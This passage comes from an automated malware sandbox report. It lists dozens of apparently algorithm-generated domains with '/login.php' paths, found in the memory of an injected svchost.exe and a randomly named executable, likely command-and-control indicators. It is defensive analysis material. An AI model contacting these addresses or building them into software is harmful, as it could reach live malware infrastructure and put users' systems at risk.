0000000B.00000002.2614917822.000000000154E000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000000B.00000002.2745540362.00000000093CD000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000013.00000002.2853769839.000000000988D000.00000004.00000010.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000013.00000002.2640207678.0000000001363000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000013.00000002.2756051050.000000000914B000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000015.00000002.2856769526.0000000008FC3000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000015.00000002.2676238100.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000018.00000002.2676884944.00000000009FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzylyp.com/login.php
Source: svchost.exe, 00000002.00000003.2885524752.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2377062429.0000000003357000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2879404289.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2902106768.00000000040FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2896263867.0000000000854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzymup.com/login.php
Source: svchost.exe, 00000002.00000003.2726510414.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2361263640.0000000000852000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2746470521.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2746888339.0000000000854000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2829874698.000000000084D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzypav.com/login.php
Source: svchost.exe, 00000002.00000003.2329963433.0000000003319000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328865580.0000000003315000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329926664.0000000003317000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328162774.0000000003315000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzytap.com/
Source: svchost.exe, 00000002.00000003.2337886081.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337365737.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337520424.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2601374159.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2336882213.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635608953.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2612862437.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzywuq.com/login.php
Source: svchost.exe, 00000002.00000003.2757808782.0000000003319000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2363891080.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2364207806.0000000000852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzyxip.com/login.php
Source: svchost.exe, 00000002.00000003.2337886081.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329364841.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2327922219.00000000092C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2330522610.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzyxyv.com/login.php
Source: svchost.exe, 00000002.00000003.2726510414.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2360502034.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760150538.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2746470521.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2358968663.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2358089375.00000000092C8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2852112632.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2363422290.00000000092C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2359102012.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2363692365.00000000092C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2362592176.00000000092C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebyfup.com/login.php
Source: svchost.exe, 00000002.00000003.2666875773.00000000040F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2746888339.0000000000854000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667617957.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2829874698.000000000084D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667608142.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667040821.00000000040FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebyhag.com/login.php
Source: svchost.exe, 00000002.00000002.3428370692.00000000092EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3418118048.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2919185604.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3287645590.00000000092EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2381728153.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3408110880.0000000000855000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3421967691.00000000040FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebyhuv.com/login.php
Source: svchost.exe, 00000002.00000003.2649333466.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2678962210.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2657780583.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2672508299.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347333934.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667583572.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665259102.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347614295.0000000000853000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebykul.com/login.php
Source: svchost.exe, 00000002.00000003.2637865779.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2344112591.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635608953.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635305989.0000000003378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2341852646.00000000092B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebylov.com/login.php
Source: svchost.exe, 00000002.00000003.2885524752.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2879404289.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2377025491.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380581815.00000000092C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2896263867.0000000000854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebylyp.com/login.php
Source: svchost.exe, 00000002.00000003.2666875773.00000000040F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667617957.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2693258532.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2672508299.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667608142.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667040821.00000000040FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebyniv.com/login.php
Source: svchost.exe, 00000002.00000003.2649333466.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347333934.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347614295.0000000000853000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebyqeq.com/login.php
Source: svchost.exe, 00000002.00000003.2376137841.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380222392.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2902106768.00000000040FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2381728153.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3426788667.0000000009235000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebyrel.com/login.php
Source: svchost.exe, 00000002.00000003.2346403174.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346603921.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2342419975.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2341852646.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346691543.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349309789.00000000092C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebyrip.com/login.php
Source: svchost.exe, 00000002.00000003.2337886081.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329364841.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2327922219.00000000092C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2330522610.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebysul.com/login.php
Source: svchost.exe, 00000002.00000003.2337886081.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2601374159.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2571444797.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2612862437.00000000092B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebyteg.com/login.php
Source: svchost.exe, 00000002.00000003.2337886081.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329364841.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2327922219.00000000092C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2607855494.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2330522610.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2609571355.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547959760.00000000092E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebyxyq.com/login.php
Source: svchost.exe, 00000002.00000003.2337886081.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337365737.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337520424.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337073481.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2601374159.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2336882213.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2612862437.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2336470104.0000000003356000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qedyfog.com/login.php
Source: svchost.exe, 00000002.00000003.2329963433.0000000003319000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328865580.0000000003315000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329926664.0000000003317000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2546812858.00000000040F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328162774.0000000003315000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qedyhyl.com/
Source: svchost.exe, 00000002.00000003.2513678339.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2311968303.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2542956129.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2310767470.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513019694.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2311498378.000000000337A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499635923.0000000000855000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2310062012.000000000337A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qedyleq.com/login.php
Source: svchost.exe, 00000002.00000003.2666875773.00000000040F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2678962210.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2693258532.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2653309169.00000000033EE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667608142.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667583572.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665259102.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356885542.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667040821.00000000040FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356000937.00000000092BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qedylig.com/login.php
Source: svchost.exe, 00000002.00000003.2334241023.00000000008E1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337365737.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337520424.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2612622918.0000000000854000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2631989272.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337073481.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2601374159.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2571444797.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2575537635.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2612862437.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2336999342.00000000008E7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2336470104.0000000003356000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qedynaq.com/login.php
Source: svchost.exe, 00000002.00000003.2587482853.00000000033CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qedynaq.com/login.php//vofymem.com/
Source: svchost.exe, 00000002.00000003.2853017937.000000000085D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qedynug.com/http://qeqysap.com/
Source: svchost.exe, 00000002.00000003.2637865779.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337886081.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329364841.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2330574542.0000000003356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2327922219.00000000092C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2607855494.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2330522610.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635608953.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2609571355.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547959760.00000000092E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qedyqup.com/login.php
Source: svchost.exe, 00000002.00000002.3428370692.00000000092EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2919185604.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2379463124.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380581815.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3287645590.00000000092EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2905696441.00000000092E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qedysol.com/login.php
Source: svchost.exe, 00000002.00000003.2513678339.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2542956129.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513019694.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499635923.0000000000855000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2496966130.0000000000851000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qedysov.com/login.php
Source: svchost.exe, 00000002.00000003.2649333466.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347333934.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346961253.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347614295.0000000000853000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qedysyp.com/login.php
Source: svchost.exe, 00000002.00000003.2678962210.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667617957.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2693258532.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2672508299.00000000092B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qedytoq.com/login.php
Source: svchost.exe, 00000002.00000003.2513678339.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2542956129.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513019694.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499635923.0000000000855000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qedytul.com/login.php
Source: svchost.exe, 00000002.00000002.3428370692.00000000092EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2919185604.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388023341.0000000000852000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3287645590.00000000092EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3408110880.0000000000855000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398171627.0000000000854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qedytyg.com/login.php
Source: svchost.exe, 00000002.00000003.2236990443.0000000003301000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2237616920.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2427094852.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2237218965.00000000008E1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2237923899.0000000003303000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qedyveg.com/login.php
Source: svchost.exe, 00000002.00000003.2346403174.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346603921.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635305989.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2341852646.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356885542.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346691543.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356000937.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349309789.00000000092C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qedyvuv.com/login.php
Source: svchost.exe, 00000002.00000003.2347539212.0000000003309000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2647508543.000000000331E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qedyxel.com/
Source: svchost.exe, 00000002.00000003.2347539212.0000000003309000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2650495835.0000000003309000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2650014492.0000000003307000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qedyxel.com/H
Source: svchost.exe, 00000002.00000003.2649333466.00000000092E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qedyxel.com/http://volygoc.com/H
Source: svchost.exe, 00000002.00000003.2649333466.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2657780583.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2649747897.00000000040F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2649350353.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347333934.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2647496494.00000000040F3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347614295.0000000000853000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qedyxel.com/login.php
Source: svchost.exe, 00000002.00000003.2513678339.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2542956129.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513019694.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499635923.0000000000855000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2496966130.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2297411828.0000000003356000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qedyxip.com/login.php
Source: svchost.exe, 00000002.00000003.2885524752.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2902106768.00000000040FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2896263867.0000000000854000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2884058737.00000000092E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qegyfeq.com/login.php
Source: svchost.exe, 00000002.00000003.2223016601.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2397665900.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2414263063.00000000033CA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388023341.0000000000852000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2197741050.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425745567.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388180124.0000000009327000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2422762232.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388405607.00000000033C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2178331950.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2178415911.00000000033F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2185076169.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398171627.0000000000854000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513835440.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499628727.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2622033644.0000000008E8D000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2622033644.0000000008E20000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2604863482.0000000001098000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000003.2572564754.0000000000FB2000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2718258067.0000000008D8F000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2744689381.0000000009396000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://qegyhig.com/login.php
